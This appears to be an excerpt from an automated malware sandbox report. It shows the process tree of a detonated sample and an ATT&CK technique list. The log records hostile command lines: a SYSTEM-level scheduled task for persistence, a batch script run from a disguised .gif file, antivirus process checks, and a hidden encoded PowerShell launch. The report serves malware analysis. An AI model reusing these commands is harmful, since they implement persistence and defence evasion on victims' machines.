schtasks /CREATE /TN "booXbIzkEgfNdKvxAC" /SC once /ST 04:22:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\FROlSPZ.exe\" j6 /site_id 525403 /S" /V1 /F
6⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2524

C:\Users\Admin\Pictures\Adobe Films\P6tEWY2AIo4GKtU74DBm3ips.exe
"C:\Users\Admin\Pictures\Adobe Films\P6tEWY2AIo4GKtU74DBm3ips.exe"
3⤵
- Executes dropped EXE
PID:2236

C:\Users\Admin\Pictures\Adobe Films\AvYsoeUKHZHOE7oO3qZJF5Rg.exe
"C:\Users\Admin\Pictures\Adobe Films\AvYsoeUKHZHOE7oO3qZJF5Rg.exe"
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2136

C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20220312041857.log C:\Windows\Logs\CBS\CbsPersist_20220312041857.cab
1⤵
- Drops file in Windows directory
PID:980

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Affaticato.gif
1⤵
PID:2524

C:\Windows\SysWOW64\cmd.exe
cmd
2⤵
PID:2616

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq BullGuardCore.exe"
3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2648

C:\Windows\SysWOW64\find.exe
find /I /N "bullguardcore.exe"
3⤵
PID:2660

C:\Windows\SysWOW64\find.exe
find /I /N "psuaservice.exe"
3⤵
PID:2996

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq PSUAService.exe"
3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2988

C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^uEDzPzHFCdzewXWMRhXuwzGNjMXXrsYuMnTuDfFnaaWMxrxJAnNdPOrNYPircJBlshdCrQoBHnNIvTzoshbFDH$" Koubbeh.gif
3⤵
PID:2660

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Accostarmi.exe.pif
Accostarmi.exe.pif N
3⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2064

C:\Windows\SysWOW64\waitfor.exe
waitfor /t 5 jFjyKdbHiNcpqGHLaDXhhIXfDT
3⤵
PID:2992

C:\Windows\system32\taskeng.exe
taskeng.exe {BA6E02C6-BF85-4046-927E-DC4D8E4ECA59} S-1-5-21-2199625441-3471261906-229485034-1000:DRLQIXCW\Admin:Interactive:[1]
1⤵
PID:2804

C:\Users\Admin\AppData\Roaming\atcfdts
C:\Users\Admin\AppData\Roaming\atcfdts
2⤵
- Executes dropped EXE
PID:2596

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
2⤵
- Executes dropped EXE
PID:2116

C:\Users\Admin\AppData\Local\cache\MoUSO.exe
C:\Users\Admin\AppData\Local\cache\MoUSO.exe
2⤵
- Executes dropped EXE
PID:2736

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-2066693891-176910368-1765247502393492763-15561551231890543330-859114097624174435"
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2056

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1150288732-3406682202135745147-5103701957093978471706679387-768808129-1069771729"
1⤵
- Executes dropped EXE
PID:2192

C:\Windows\SysWOW64\oxsopzki\vuojjxkr.exe
C:\Windows\SysWOW64\oxsopzki\vuojjxkr.exe /d"C:\Users\Admin\Pictures\Adobe Films\x8SBfZE_z7wYViyOSKxSBQ5T.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1996

C:\Windows\SysWOW64\svchost.exe
svchost.exe
2⤵
PID:2752

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1753560343-1823246733293828279-13827099-64928316-2037030990-1126181132-517356342"
1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2568

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "81736002-4788283158444853641603137282-212045928-1332282706-14107722242085220040"
1⤵
PID:2752

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Command-Line Interface

T1059

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

New Service

T1050

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Hidden Files and Directories

T1158

Privilege Escalation

New Service

T1050

Scheduled Task

T1053

Defense Evasion

Modify Registry

Disabling Security Tools

T1089

Virtualization/Sandbox Evasion

T1497

Impair Defenses

T1562

Install Root Certificate

T1130

Hidden Files and Directories

T1158

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

Virtualization/Sandbox Evasion

T1497

System Information Discovery